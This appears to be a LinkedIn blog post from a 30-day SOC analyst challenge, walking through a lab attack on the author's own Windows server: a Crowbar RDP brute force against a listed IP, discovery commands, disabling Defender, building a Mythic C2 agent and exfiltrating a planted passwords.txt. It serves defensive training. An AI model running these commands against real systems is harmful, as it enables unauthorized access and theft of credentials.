Day 21: Performing a Brute Force Attack and Using Mythic C2
Welcome to Day 21 of the 30-Day SOC Analyst Challenge! Today, we're diving into some advanced techniques used by both attackers and defenders. We'll be performing a brute force attack, generating a Mythic agent, and establishing a successful Command and Control (C2) session from a Windows server. This hands-on experience will give you valuable insights into how these attacks work and how to detect them.
Our Objective
Our goal for today is to follow this attack diagram and perform a brute force attack using Mythic C2:
1. Use Kali Linux to perform a brute force attack on our Windows server
2. Perform discovery commands
3. Implement defense evasion techniques
4. Use Mythic C2 to generate a payload and create a Mythic agent
5. Download and execute the Mythic agent on the Windows server
6. Establish a C2 connection and exfiltrate a password file
Setting Up the Environment
Before we begin, let's set up our Windows server:
1. Create a file called "passwords.txt" in the Documents folder
2. Change the administrator password to "Summer2024!"
3. Modify the Group Policy to allow weaker passwords
Phase 1: Brute Force Attack
We'll use a tool called Crowbar to perform the brute force attack:
1. Create a wordlist with common passwords
2. Add our target password to the list
3. Run Crowbar against the Windows server
crowbar -b rdp -u administrator -C my_dfir_wordlist.txt -s 149.248.59.41/32
Within seconds, we successfully obtained the credentials!
Phase 2: Discovery
After gaining access, we performed some basic discovery commands:
- whoami
- ipconfig
- net user
- net group
These commands help an attacker understand the environment they've compromised.
领英推荐
Phase 3: Defense Evasion
To avoid detection, we disabled Windows Defender through the GUI. In a real-world scenario, this might be done more stealthily through PowerShell or command-line tools.
Phase 4: Execution - Building the Mythic Agent
Now, let's set up our Mythic C2 server:
1. Install the Apollo agent
./mythic-cli install github https://github.com/MythicAgents/apollo
Install HTTP C2 profile
./mythic-cli install github https://github.com/MythicC2Profiles/http
You will be able to this apollo agent and C2 profile in your mythic GUI.
2. Generate a new payload with custom settings
Click on the Actions button on the top right corner and then select Generate New Payload.
You will see the following screen, in the Callback host value fill your mythic agent public ip address and callback port to 80. Hit next and Generate Payload.
3. Download the payload to our Mythic server
Phase 5: Establishing the C2 Connection
Execute the Payload
Run the downloaded executable on the compromised windows server:
Phase 6: Exfiltration
Finally, we used our C2 session to exfiltrate the "passwords.txt" file we created earlier:
download C:\Users\Administrator\Documents\passwords.txt
The file was successfully downloaded to our Mythic server, completing our attack chain.
Conclusion
Today's challenge gave us hands-on experience with several advanced techniques used in real-world attacks. Understanding these methods is crucial for SOC analysts to effectively detect and respond to threats.
Remember, these skills should only be used ethically and legally. Always practice in controlled, authorized environments.
IT Manager na Global Blue Portugal | Especialista em Tecnologia Digital e CRM
6 个月Diving into those advanced techniques sounds intense! Really highlights how vital it is to stay ahead in the cybersecurity game. Curious about your thoughts on balancing security and usability?